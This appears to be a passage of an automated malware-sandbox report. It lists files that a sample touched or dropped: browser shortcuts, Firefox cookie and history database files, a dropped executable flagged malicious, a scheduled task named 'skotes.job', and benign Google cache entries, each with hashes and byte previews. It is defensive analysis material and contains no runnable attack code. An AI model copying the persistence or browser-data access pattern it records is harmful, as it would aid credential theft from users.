MD5:	6A72B12211265BD1367A5FC45C26EC05
SHA1:	74429EE7060BC57FAE4632B3D2D21E7056A0493A
SHA-256:	829E3D92A827B47474E7AA45E26772B1550B2930B918BC0A51B8E8A849DAF895
SHA-512:	3C630DDF25FEDB8964B3ED4C4F11C78C8F235CD431516AA09389A943FF63DBB549A4EAE6A3855131B22229D4DB872A236C4C7177EA3781A8EF70480A1F3B2D6E
Malicious:	false
Preview:	L..................F.@.. ...$+.,......^L.4..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IkY.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VkY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VkY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VkY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VkY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............}UV.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 11 22:06:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9951391927329882
Encrypted:	false
SSDEEP:	48:8Wd7TjvvHtidAKZdA1weh/iZUkAQkqehSy+2:8unN9Q/y
MD5:	1C44170728924FDF90ECF1396E472D89
SHA1:	532887F457A7C8368CBFC780B1850726547F7B0F
SHA-256:	873F99550191921F07055BBE8B4A1755EFFA50009402F86E9DA4FD663EF998AC
SHA-512:	088517CB7EF3964F76A127125A1AC62C62D1E9FD4E99F5C210CEEB10EB72E8E768486CF9CE8E9BCA108397BB334D73C01E11A574A5EE227A4B89ADBF38FA4B36
Malicious:	false
Preview:	L..................F.@.. ...$+.,......UL.4..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IkY.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VkY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VkY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VkY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VkY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............}UV.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.0065809375989
Encrypted:	false
SSDEEP:	48:8xYd7TjvsHtidAKZdA14tseh7sFiZUkmgqeh7sgy+BX:8xEnknmy
MD5:	9EF8DEB68D0CFB19F880B3C402FBF773
SHA1:	87C359DA4EB064F287DC627858FE8B4517CBD885
SHA-256:	F498ADE326970D292D3CF9D73E3A911D4E7AE87770EC3D473A33D9E6E35E1E3B
SHA-512:	04FE8FE022A86BB4061FF409B5B6F0112D86BFA45CB83DD632CFA3A331B2F040A0CB4B83ADA851C72126EC886BC189135CA57AC764CF2839359628954A07DF8D
Malicious:	false
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IkY.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VkY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VkY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VkY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............}UV.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 11 22:06:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9921329364211027
Encrypted:	false
SSDEEP:	48:8Jd7TjvvHtidAKZdA1vehDiZUkwqehuy+R:8Pnuoy
MD5:	0C2584E93A4BE72DCE1650A9A4711637
SHA1:	4EB14177AF8494745B75E8C7773F60BDBF0984C5
SHA-256:	50E7807AF6379543E49B432D5544FDDA5C9902F6A8BF180B5B408F74CC9FED2F
SHA-512:	0B49B02AEC120E29334183C5675B6BBA65313E75D4806B05458A52F71A926303DB1A1671658B256DCB0903905A0CDE0F7F1CF0B0560685D940395B90AC68B2FB
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....9?L.4..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IkY.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VkY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VkY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VkY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VkY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............}UV.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 11 22:06:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9830189851438655
Encrypted:	false
SSDEEP:	48:8Xfd7TjvvHtidAKZdA1hehBiZUk1W1qehEy+C:8Jne9ky
MD5:	3E59474FFD995B7A33277DA565876EAF
SHA1:	9382700B735C4A2352C02DCBA01532C66FF0E12A
SHA-256:	A2995FB7FC9C09DDB77736584DA8AE80B624846A04AD36AE3036362FBC962210
SHA-512:	1D59FA55B3A18356754287CEF07C1CCB1559D871640199C140EF2327203CBFC97EAAEACC3C02F70A8E31FBEABB0FDC78AAFB34702B492315CDE8C41EDF426A94
Malicious:	false
Preview:	L..................F.@.. ...$+.,......ZL.4..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IkY.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VkY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VkY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VkY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VkY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............}UV.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 11 22:06:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.9907748581714584
Encrypted:	false
SSDEEP:	48:8/d7TjvvHtidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbmy+yT+:8ZnAT/TbxWOvTbmy7T
MD5:	FC2A54B8FA7D8B0AE8B974B817CCCC14
SHA1:	5E22470675BE118B9A58693A1F865D1F20AB1B9F
SHA-256:	DCFF422BAC7C19F6D0336B41FA4D734F1A158BAC9BAF000F599D75283F2D4D8C
SHA-512:	1369373A9E445DF6288CFE84DC9938A9B1F2C4F72C184231E704658CF4A00B2D7D6C54C68033ABB5D5316E4D6E2285DE08AC8688833E778766A65A524CBE7C6C
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....36L.4..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IkY.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VkY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VkY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VkY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VkY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............}UV.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\DocumentsECAFHIIJJE.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3271168
Entropy (8bit):	6.671104203446932
Encrypted:	false
SSDEEP:	49152:iScFB5I5BoeCFO7YJbyPVavDBpbtG8Hz+L/7HndLT7Y9O:iScFEnoeCFO7YJ2PVavbtGoI7FY9O
MD5:	B4DF44B9A693D554AD3FCC4F32D5E470
SHA1:	32EA2138EBEF8CB84BFA7541398F43D86B6F3C6F
SHA-256:	8A302DCD657F4443283E5BD307EB99452FD388AC9CFB8756DB734511AE234866
SHA-512:	7081A5F5BB178B0483A5119D9A5BC6CFD2853965E996FE8A42A621237EBBC87ECBB426830E0754C2D05EFE14C6BCE8E1F2842494912C6FEB43D262BA2F79DD90
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@.......................... 2......O2...@.................................W...k...........................l.1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...lwvftjpd.0+......0+.................@...ppdaehht......1.......1.............@....taggant.0....1.."....1.............@...........................................................................................................................................................................................................................................................

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\DocumentsECAFHIIJJE.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.413085497637989
Encrypted:	false
SSDEEP:	6:NtVX55ZsUEZ+lX1CGdKUe6tFXqYEp5t/uy0lBaEt0:NtRuQ1CGAFifXVBaEt0
MD5:	DBBB841217DCDB6B84566EF46E4F78C6
SHA1:	72EB59F49B374671975C3AA901501943089D2E09
SHA-256:	8A2A1D899BEC3EEA22496A4725A23F39E6A5CF5949E440553631EF3EB1729E07
SHA-512:	2C7D514BE8CD35A9E52913B084FD289AF2E27B3A90646B5BCC214A82C24008657185DA77D3C87447423FB310222738028C898941B9D15EE8B0A97A5BD20645B1
Malicious:	false
Preview:	......G....K....P!.eF.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.418945219460436
Encrypted:	false
SSDEEP:	6144:nSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNd0uhiTw:SvloTMW+EZMM6DFyn03w
MD5:	942A281AED390E76AD9DF211F314F06A
SHA1:	473DA106A8006E981D25CFFECA3D1F3E724A56BF
SHA-256:	149F9DAB58DF32741028677BF013C39B255834F5EEBD3771FE3C0AD16F6AE1CE
SHA-512:	BAFDC9B025E7A6438FE5977D79FF8520C8F4078A96EB7688627A14F6A8D5BC7B3D3F57423EE2937AEE088B8068C10224CA66BDC76015A8B85310C3DC910B9381
Malicious:	false
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...r.4.................................................................................................................................................................................................................................................................................................................................................F........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 513

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (776)
Category:	downloaded
Size (bytes):	781
Entropy (8bit):	5.140083789128254
Encrypted:	false
SSDEEP:	24:YewwbKtvDGBHslgT9lCuABuoB7HHHHHHHYqmffffffo:Yub+DGKlgZ01BuSEqmffffffo
MD5:	F854A1B8C06C628B950EAD3B0839552A
SHA1:	F798309D89078306E2A55DA3316614096C4FA8F8
SHA-256:	20A748C7855369E5E64289CEB5461E5E0CC21A6A1A642A73C95764D6EFFE9395
SHA-512:	5754F4671D8BB088ECBE27953CC4BB0646FBAC03CB80C97BA0979C8312ED400DEBDDBCDEFDB5DD25E58E8140041F4A2E2E3C4651BF75A7D5B4232B3976AFD27F
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["memphis football karmelo overton","deadpool wolverine disney plus","aurora borealis forecast","shiba inu crypto","cuba earthquakes","nintendo switch emulator","general hospital spoilers","bryce underwood connor stalions"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

Chrome Cache Entry: 514

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 515

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2586)
Category:	downloaded
Size (bytes):	174097
Entropy (8bit):	5.554845848492248
Encrypted:	false
SSDEEP:	3072:49GysOAIZQy3ZZb6L5BfizRURkgq3ocEs7BB19HDKDSfEISlCMDyQhnF/VU9cpar:49G3IZP3ZZmHfiz+R7q3ocV7BB19HDKq
MD5:	292ACC11525E24B0501DEAC4EB7B61D4
SHA1:	4840E1B06489D1210E25C620AC0E4DEA33F4A574
SHA-256:	A5CB759FC6BF64DD1E35731C88899928B098A359EFF9CA5B34B91F23ADE02C2B
SHA-512:	FBDB4B2B4B647F734B6E05D0495CE1135E9536D611BC567A3B47353FEC986B92412153C214EFE776BC6391239076B3DA6B79851C8BE036C00E4AD026F88CC683
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.ciOLm-Jy21Y.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTvi2-a6fPowp_OrDQczHs8e8wA2zQ"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.ej=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var fj,gj,ij,lj,oj,nj,hj,mj;fj=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};gj=function(){_.Ka()};ij=function(){hj===void 0&&(hj=typeof WeakMap==="function"?fj(WeakMap):null);return hj};lj=function(a,b){(_.jj\|\|(_.jj=new hj)).set(a,b);(_.kj\|\|(_.kj=new hj)).set(b,a)};.oj=function(a){if(mj===void 0){const b=new nj([],{});mj=Array.prototype.concat.call([],b).length===1}mj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.pj=function(a,b,c){a=_.zb(a,b,c);return Array.isArray(a)?a:_.Kc};_.qj=function(a,b){a=(2&b?a\|2:a&-3)\|32;return a&=-2049};_.rj=function(a,b){a===0&&(a=_.qj(a,b));return a\|1};_.sj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.tj=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.xj=function(a,b,c,d,e,f,g){const h=a.ha;var k=!!(2&b);e=k?1:e;

Chrome Cache Entry: 516

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	133674
Entropy (8bit):	5.432607009807852
Encrypted:	false
SSDEEP:	1536:i7C/VNgg7Yp+GhGLhJgJoamyeX43zGiJsKtPLx8OF97f4qlgjCFlOve2dzAcJ82O:fZ7vhSJjxeX431PBLx8OF9jvYsci2i6o
MD5:	3564C46E0A119B4C4978FB7F44804BF8
SHA1:	E0E0DD81400DC932AA9F5A670F5E825EF0E1BEC5
SHA-256:	1E9C080661A061954DBF4EC2A0C1CE0E607CD1C97FF406D0B0269C1C5CCE2AC9
SHA-512:	DC0A0F10030896D9D2C30115E302C944EFAE50154B3F24366133FE484021E89A74C957AAADE870BE86CA24BAB2BE96AF127FA300358B78785F71FF92ED272D58
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 517

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1302)
Category:	downloaded
Size (bytes):	117949
Entropy (8bit):	5.4843553913091005
Encrypted:	false
SSDEEP:	3072:D7yvvjOy7sipKTr3dH39oogNLLDzZzS7oF:D7yjOy7LS39mnhS7oF
MD5:	A5D33473ED0997C008D1C053E0773EBE
SHA1:	FEB4CB89145601A0141CC5869BEDF9AE7CD5CB80
SHA-256:	14C27BB0224FCF89A43B444B427DABE3D0AF184CAA7B6B4990CE228C51AE01C1
SHA-512:	3C0A48F9FA05469F950D9A268F1B3E9285A783A555EE597A2E203B688EB0FBCAEA3F4DE9BC8F5381C661007D0C6C4AFA70C19B7826D69A0E2A914A55973D14BD
Malicious:	false
URL:	"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0"
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);.var da,ea,ha,na,oa,sa,ta,wa;da=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);na=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r

Chrome Cache Entry: 518

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
